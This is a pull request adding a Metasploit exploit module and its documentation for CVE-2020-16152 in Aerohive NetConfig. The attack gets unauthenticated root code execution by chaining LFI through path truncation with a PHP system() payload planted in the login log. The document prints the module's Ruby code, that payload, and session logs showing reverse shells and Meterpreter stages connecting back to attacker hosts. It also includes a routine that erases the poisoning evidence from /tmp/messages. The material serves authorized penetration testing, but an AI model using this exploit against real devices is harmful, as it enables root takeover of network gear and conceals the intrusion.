### PR TITLE
Add Aerohive NetConfig <= 10.0r8a RCE (CVE-2020-16152) module and docs

### DIFF
--- a/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
+++ b/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
@@ -1,0 +1,102 @@
+## Vulnerable Application
+This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older
+in order to achieve unauthenticated remote code execution as the root user.
+
+NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable Aerohive NetConfig versions allow for LFI
+because they rely on a version of PHP 5 that is vulnerable to string truncation attacks.
+
+The module's `check` method attempts to obtain the Aerohive NetConfig version via a simple HTTP GET request to `/index.php5`.
+
+If the target seems vulnerable based on the version, the module attempts to poison the `/tmp/messages` log file
+via the POST parameter `userName` in an intentially failed login attempt to `/login.php5`.
+The value of `userName` is set to a payload according to this format: `"<?php system($_POST['cmd']);?>"`.
+Because failed login attempts are logged to `/tmp/messages` and include the submitted username,
+the `/tmp/messages` log can be effectively poisoned in this manner.
+
+Next, the module attempts to run code via `/tmp/messages` by means of an HTTP POST request to `action.php5`.
+This request includes two POST parameters:
+1. The `_page` parameter, which is the one vulnerable to LFI via path truncation.
+2. The parameter that is used to execute commands via `/tmp/messages`.
+In our example the name would be `cmd`, but the module sets this to an aribtrary value.
+
+Aerohive runs an ARM-based version of Linux that is not compatible with most payloads.
+However, the `cmd/unix/reverse_openssl` payload is fully reliable and allows for repeated exploitation.
+
+This module has been successfully tested against Aerohive NetConfig version 10.0r7a.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to Aerohive NetConfig. The default value is `/`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   CMD
+```
+
+## Scenarios
+### Aerohive NetConfig 10.0r7a
+```
+msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > show options
+
+Module options (exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.39     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to Aerohive NetConfig
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_openssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.66     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   CMD
+
+
+msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > run
+
+[*] Started reverse double SSL handler on 192.168.1.66:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 10.0r7a
+[*] Attempting to poison the log at /tmp/messages...
+[*] Server responded as expected. Continuing...
+[*] Attempting to execute the payload
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[!] In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages
+[!] Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:
+        <?php system($_POST['TEVwXm']);?>
+[*] Command: echo rVKzZFZ3xozDeyYd;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "rVKzZFZ3xozDeyYd\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 8 opened (192.168.1.66:4444 -> 192.168.1.39:39029) at 2021-09-22 23:07:51 +0000
+
+id
+uid=0(root) gid=0(root)
+```

--- a/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
+++ b/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
@@ -19,6 +19,13 @@ This request includes two POST parameters:
 2. The parameter that is used to execute commands via `/tmp/messages`.
 In our example the name would be `cmd`, but the module sets this to an aribtrary value.
 
+Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open.
+Closing the session should render the app responsive again.
+
+The module provides an automatic cleanup option to clean the log.
+However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed,
+may render the target (temporarily) unexploitable. This state can last over an hour.
+
 Aerohive runs an ARM-based version of Linux. The module supports two targets, a `Linux` target for `ARCH_ARMLE` payloads
 and a `CMD` starget for `cmd/unix` payloads.
 It should be noted that for the `CMD` target, the only reliable payload seems to be `cmd/unix/reverse_openssl`.
@@ -30,7 +37,7 @@ they failed to inform the researcher about the timeline for fixing it.
 As a result, the researcher ultimately released the details and PoC on their own
 in September of last year. As of now, the CVE status is still `RESERVED`.
 
-This module has been successfully tested against Aerohive NetConfig version 10.0r7a.
+This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a.
 
 ## Verification Steps
 1. Start msfconsole
@@ -52,32 +59,34 @@ Id  Name
 ```
 
 ## Scenarios
-### Aerohive NetConfig 10.0r7a - Linux target
+### Aerohive NetConfig 8.2r4 - Linux target - AUTO_CLEAN_LOG false
 ```
 Module options (exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     192.168.1.39     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki
-                                         /Using-Metasploit
-   RPORT      443              yes       The target port (TCP)
-   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address o
-                                         n the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT    8080             yes       The local port to listen on.
-   SSL        true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /                yes       The base path to Aerohive NetConfig
-   URIPATH                     no        The URI to use for this exploit (default is random)
-   VHOST                       no        HTTP server virtual host
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   AUTO_CLEAN_LOG  false            yes       Automatically clean the /tmp/messages log upon spawning a shell. WARN
+                                              ING! This may render the target unexploitable
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          92.168.1.151     yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
+                                              k/wiki/Using-Metasploit
+   RPORT           443              yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an add
+                                              ress on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /                yes       The base path to Aerohive NetConfig
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   VHOST                            no        HTTP server virtual host
 
 
 Payload options (linux/armle/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.1.66     yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
+   LHOST  192.168.1.229    yes       The listen address (an interface may be specified)
+   LPORT  4000             yes       The listen port
 
 
 Exploit target:
@@ -89,87 +98,161 @@ Exploit target:
 
 msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.66:4444
+[*] Started reverse TCP handler on 192.168.1.229:4000
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 10.0r7a
+[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 8.2r4
 [*] Attempting to poison the log at /tmp/messages...
 [*] Server responded as expected. Continuing...
-[*] Using URL: http://0.0.0.0:8080/PVqYZ0a
-[*] Local IP: http://192.168.1.66:8080/PVqYZ0a
+[*] Using URL: http://0.0.0.0:8080/tCSLFVW4TC
+[*] Local IP: http://192.168.1.229:8080/tCSLFVW4TC
 [*] Attempting to execute the payload
-[!] In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages
-[!] Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:
-        <?php system($_POST['PD3C']);?>
-[*] Command Stager progress - 100.00% done (112/112 bytes)
-[*] Client 192.168.1.39 (curl/7.50.1) requested /PVqYZ0a
-[*] Sending payload to 192.168.1.39 (curl/7.50.1)
-[*] Sending stage (902256 bytes) to 192.168.1.39
-[*] Meterpreter session 1 opened (192.168.1.66:4444 -> 192.168.1.39:39216) at 2021-09-23 22:07:56 +0000
+[!] In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.
+[*] Command Stager progress - 100.00% done (116/116 bytes)
+[*] Client 192.168.1.151 (curl/7.50.1) requested /tCSLFVW4TC
+[*] Sending payload to 192.168.1.151 (curl/7.50.1)
+[*] Sending stage (902096 bytes) to 192.168.1.151
+[!] Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:
+   <?php system($_POST['PPv9j']);?>
+[!] Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.
+[!] Deleting /tmp/messages or clearing out the file may break the application.
+[*] Meterpreter session 23 opened (192.168.1.229:4000 -> 192.168.1.151:57350 ) at 2021-11-02 16:51:28 +0000
 [*] Server stopped.
 
-meterpreter > getuid
-Server username: root @ AH-5fb7c0 (uid=0, gid=0, euid=0, egid=0)
-meterpreter > sysinfo
-Computer     : 192.168.1.39
-OS           :  (Linux 3.16.36)
-Architecture : armv7l
-BuildTuple   : armv5l-linux-musleabi
-Meterpreter  : armle/linux
+meterpreter > shell
+Process 2637 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root)
+grep 'php system' /tmp/messages
+2021-11-02 11:51:26 notice  ah_webui: security: Admin "<<?php system($_POST['PPv9j']);?>>" failed to log in
 ```
 
-### Aerohive NetConfig 10.0r7a - CMD target
+### Aerohive NetConfig 8.2r4 - Linux target - AUTO_CLEAN_LOG true
 ```
-msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > show options
-
 Module options (exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     192.168.1.39     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT      443              yes       The target port (TCP)
-   SSL        true             no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                yes       The base path to Aerohive NetConfig
-   VHOST                       no        HTTP server virtual host
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   AUTO_CLEAN_LOG  true             yes       Automatically clean the /tmp/messages log upon spawning a shell. WARN
+                                              ING! This may render the target unexploitable
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          92.168.1.151     yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
+                                              k/wiki/Using-Metasploit
+   RPORT           443              yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an add
+                                              ress on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /                yes       The base path to Aerohive NetConfig
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   VHOST                            no        HTTP server virtual host
 
 
-Payload options (cmd/unix/reverse_openssl):
+Payload options (linux/armle/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.1.66     yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
+   LHOST  192.168.1.229    yes       The listen address (an interface may be specified)
+   LPORT  4001             yes       The listen port
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   CMD
+   0   Linux
+
+
+msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.229:4001
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 8.2r4
+[*] Attempting to poison the log at /tmp/messages...
+[*] Server responded as expected. Continuing...
+[*] Using URL: http://0.0.0.0:8080/d6UNmlXIko
+[*] Local IP: http://192.168.1.229:8080/d6UNmlXIko
+[*] Attempting to execute the payload
+[!] In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.
+[*] Command Stager progress - 100.00% done (116/116 bytes)
+[*] Client 192.168.1.151 (curl/7.50.1) requested /d6UNmlXIko
+[*] Sending payload to 192.168.1.151 (curl/7.50.1)
+[*] Sending stage (902096 bytes) to 192.168.1.151
+[*] Attempting to clean the log file at /tmp/messages...
+[!] Please note this will render the target (temporarily) unexploitable. This state can last over an hour.
+[+] Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.
+[*] Meterpreter session 24 opened (192.168.1.229:4001 -> 192.168.1.151:52430 ) at 2021-11-02 16:55:12 +0000
+[*] Server stopped.
+
+meterpreter > shell
+Process 3096 created.
+Channel 1 created.
+grep 'php system' /tmp/messages
+id
+uid=0(root) gid=0(root)
+```
+
+### Aerohive NetConfig 8.2r4 - CMD target - AUTO_CLEAN_LOG true
+```
+Module options (exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   AUTO_CLEAN_LOG  true             yes       Automatically clean the /tmp/messages log upon spawning a shell. WARN
+                                              ING! This may render the target unexploitable
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          92.168.1.151     yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
+                                              k/wiki/Using-Metasploit
+   RPORT           443              yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an add
+                                              ress on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /                yes       The base path to Aerohive NetConfig
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_openssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.229    yes       The listen address (an interface may be specified)
+   LPORT  4949             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   CMD
 
 
 msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > exploit
 
-[*] Started reverse double SSL handler on 192.168.1.66:4444
+[*] Started reverse double SSL handler on 192.168.1.229:4949
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 10.0r7a
+[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 8.2r4
 [*] Attempting to poison the log at /tmp/messages...
 [*] Server responded as expected. Continuing...
 [*] Attempting to execute the payload
+[!] In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
-[!] In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages
-[!] Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:
-        <?php system($_POST['TEVwXm']);?>
-[*] Command: echo rVKzZFZ3xozDeyYd;
+[*] Command: echo VHvH3bgm8VU8O8MN;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
 [*] Reading from socket B
-[*] B: "rVKzZFZ3xozDeyYd\n"
+[*] B: "VHvH3bgm8VU8O8MN\n"
 [*] Matching...
 [*] A is input...
-[*] Command shell session 8 opened (192.168.1.66:4444 -> 192.168.1.39:39029) at 2021-09-22 23:07:51 +0000
+[*] Attempting to clean the log file at /tmp/messages...
+[!] Please note this will render the target (temporarily) unexploitable. This state can last over an hour.
+[+] Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.
+[*] Command shell session 22 opened (192.168.1.229:4949 -> 192.168.1.151:42232 ) at 2021-11-02 16:45:53 +0000
 
 id
 uid=0(root) gid=0(root)

--- a/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
+++ b/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
@@ -22,6 +22,13 @@ In our example the name would be `cmd`, but the module sets this to an aribtrary
 Aerohive runs an ARM-based version of Linux that is not compatible with most payloads.
 However, the `cmd/unix/reverse_openssl` payload is fully reliable and allows for repeated exploitation.
 
+The [original writeup](https://github.com/eriknl/CVE-2020-16152) notes that it is unclear if/when this issue was patched,
+so versions after 10.0r8a may still be vulnerable.
+Disclosure to the vendor occurred in early 2020 and while the vendor confirmed the problem,
+they failed to inform the researcher about the timeline for fixing it.
+As a result, the researcher ultimately released the details and PoC on their own
+in September of last year. As of now, the CVE status is still `RESERVED`.
+
 This module has been successfully tested against Aerohive NetConfig version 10.0r7a.
 
 ## Verification Steps

--- a/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
+++ b/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
@@ -8,7 +8,7 @@ because they rely on a version of PHP 5 that is vulnerable to string truncation 
 The module's `check` method attempts to obtain the Aerohive NetConfig version via a simple HTTP GET request to `/index.php5`.
 
 If the target seems vulnerable based on the version, the module attempts to poison the `/tmp/messages` log file
-via the POST parameter `userName` in an intentially failed login attempt to `/login.php5`.
+via the POST parameter `userName` in an intentionally faulty login attempt to `/login.php5`.
 The value of `userName` is set to a payload according to this format: `"<?php system($_POST['cmd']);?>"`.
 Because failed login attempts are logged to `/tmp/messages` and include the submitted username,
 the `/tmp/messages` log can be effectively poisoned in this manner.
@@ -17,7 +17,7 @@ Next, the module attempts to run code via `/tmp/messages` by means of an HTTP PO
 This request includes two POST parameters:
 1. The `_page` parameter, which is the one vulnerable to LFI via path truncation.
 2. The parameter that is used to execute commands via `/tmp/messages`.
-In our example the name would be `cmd`, but the module sets this to an aribtrary value.
+In our example the name would be `cmd`, but the module sets this to an arbitrary value.
 
 Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open.
 Closing the session should render the app responsive again.

--- a/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
+++ b/documentation/modules/exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.md
@@ -19,8 +19,9 @@ This request includes two POST parameters:
 2. The parameter that is used to execute commands via `/tmp/messages`.
 In our example the name would be `cmd`, but the module sets this to an aribtrary value.
 
-Aerohive runs an ARM-based version of Linux that is not compatible with most payloads.
-However, the `cmd/unix/reverse_openssl` payload is fully reliable and allows for repeated exploitation.
+Aerohive runs an ARM-based version of Linux. The module supports two targets, a `Linux` target for `ARCH_ARMLE` payloads
+and a `CMD` starget for `cmd/unix` payloads.
+It should be noted that for the `CMD` target, the only reliable payload seems to be `cmd/unix/reverse_openssl`.
 
 The [original writeup](https://github.com/eriknl/CVE-2020-16152) notes that it is unclear if/when this issue was patched,
 so versions after 10.0r8a may still be vulnerable.
@@ -46,11 +47,77 @@ The base path to Aerohive NetConfig. The default value is `/`.
 ```
 Id  Name
 --  ----
-0   CMD
+0   Linux
+1   CMD
 ```
 
 ## Scenarios
-### Aerohive NetConfig 10.0r7a
+### Aerohive NetConfig 10.0r7a - Linux target
+```
+Module options (exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.39     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki
+                                         /Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address o
+                                         n the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to Aerohive NetConfig
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.66     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.66:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 10.0r7a
+[*] Attempting to poison the log at /tmp/messages...
+[*] Server responded as expected. Continuing...
+[*] Using URL: http://0.0.0.0:8080/PVqYZ0a
+[*] Local IP: http://192.168.1.66:8080/PVqYZ0a
+[*] Attempting to execute the payload
+[!] In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages
+[!] Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:
+        <?php system($_POST['PD3C']);?>
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Client 192.168.1.39 (curl/7.50.1) requested /PVqYZ0a
+[*] Sending payload to 192.168.1.39 (curl/7.50.1)
+[*] Sending stage (902256 bytes) to 192.168.1.39
+[*] Meterpreter session 1 opened (192.168.1.66:4444 -> 192.168.1.39:39216) at 2021-09-23 22:07:56 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root @ AH-5fb7c0 (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 192.168.1.39
+OS           :  (Linux 3.16.36)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+```
+
+### Aerohive NetConfig 10.0r7a - CMD target
 ```
 msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > show options
 
@@ -81,7 +148,7 @@ Exploit target:
    0   CMD
 
 
-msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > run
+msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > exploit
 
 [*] Started reverse double SSL handler on 192.168.1.66:4444
 [*] Running automatic check ("set AutoCheck false" to disable)

--- a/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
+++ b/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
@@ -29,8 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Erik de Jong', # github.com/eriknl - discovery
-          'Erik Wynter' # @wyntererik - Metasploit'
+          'Erik de Jong', # github.com/eriknl - discovery and PoC
+          'Erik Wynter' # @wyntererik - Metasploit
         ],
         'References' => [
           ['CVE', '2020-16152'], # still categorized as RESERVED

--- a/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
+++ b/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
@@ -25,8 +25,17 @@ class MetasploitModule < Msf::Exploit::Remote
           vulnerable to string truncation attacks. This module leverages this
           issue in conjunction with log poisoning to gain RCE as root.
 
+          Upon successful exploitation, the Aerohive NetConfig application
+          will hang for as long as the spawned shell remains open. Closing
+          the session should render the app responsive again.
+
+          The module provides an automatic cleanup option to clean the log.
+          However, this option is disabled by default because any modifications
+          to the /tmp/messages log, even via sed, may render the target
+          (temporarily) unexploitable. This state can last over an hour.
+
           This module has been successfully tested against Aerohive NetConfig
-          version 10.0r7a.
+          versions 8.2r4 and 10.0r7a.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -59,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_CMD],
               'Platform' => 'unix',
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works'
+                'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target'
               }
             }
           ]
@@ -77,7 +86,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options [
       OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']),
+      OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]),
     ]
+  end
+
+  def auto_clean_log
+    datastore['AUTO_CLEAN_LOG']
   end
 
   def check
@@ -141,6 +155,66 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Server responded as expected. Continuing...')
   end
 
+  def on_new_session(session)
+    log_cleaned = false
+    if auto_clean_log
+      print_status('Attempting to clean the log file at /tmp/messages...')
+      print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.')
+      begin
+        # We need remove the line containing the PHP system call from /tmp/messages
+        # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username.
+        # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line
+        # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same:
+        # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period.
+        line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}"
+        clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}"
+        cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\
+        "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}"
+
+        if session.type.to_s.eql? 'meterpreter'
+          session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+
+          session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"")
+
+          # Wait for cleanup
+          Rex.sleep 5
+
+          # Check for the PHP system call in /tmp/messages
+          messages_contents = session.fs.file.open('/tmp/messages').read.to_s
+          # using =~ here produced unexpected results, so include? is used instead
+          unless messages_contents.include?(@poison_cmd)
+            log_cleaned = true
+          end
+        elsif session.type.to_s.eql?('shell')
+          session.shell_command_token(cmds_to_clean_log.to_s)
+
+          # Check for the PHP system call in /tmp/messages
+          poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'")
+          # using =~ here produced unexpected results, so include? is used instead
+          unless poison_evidence.include?(@poison_cmd)
+            log_cleaned = true
+          end
+        end
+      rescue StandardError => e
+        print_error("Error during cleanup: #{e.message}")
+      ensure
+        super
+      end
+
+      unless log_cleaned
+        print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages")
+      end
+    end
+
+    if log_cleaned
+      print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.')
+    else
+      print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}")
+      print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.')
+      print_warning('Deleting /tmp/messages or clearing out the file may break the application.')
+    end
+  end
+
   def execute_command(cmd, _opts = {})
     print_status('Attempting to execute the payload')
     send_request_cgi({
@@ -151,13 +225,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'debug' => 'true'
       },
       'vars_post' => {
-        '_page' => 'a' + '/..' * 8 + '/' * 4041 + '/tmp/messages',  # Trigger LFI through path truncation
+        '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages',  # Trigger LFI through path truncation
         @shell_cmd_name => cmd
       }
     }, 0)
 
-    print_warning('In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages')
-    print_warning("Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:\n\t#{@poison_cmd}")
+    print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
+++ b/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
@@ -1,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE',
+        'Description' => %q{
+          This module exploits LFI and log poisoning vulnerabilities
+          (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a
+          build-242466 and older in order to achieve unauthenticated remote
+          code execution as the root user. NetConfig is the Aerohive/Extreme
+          Networks HiveOS administrative webinterface. Vulnerable versions
+          allow for LFI because they rely on a version of PHP 5 that is
+          vulnerable to string truncation attacks. This module leverages this
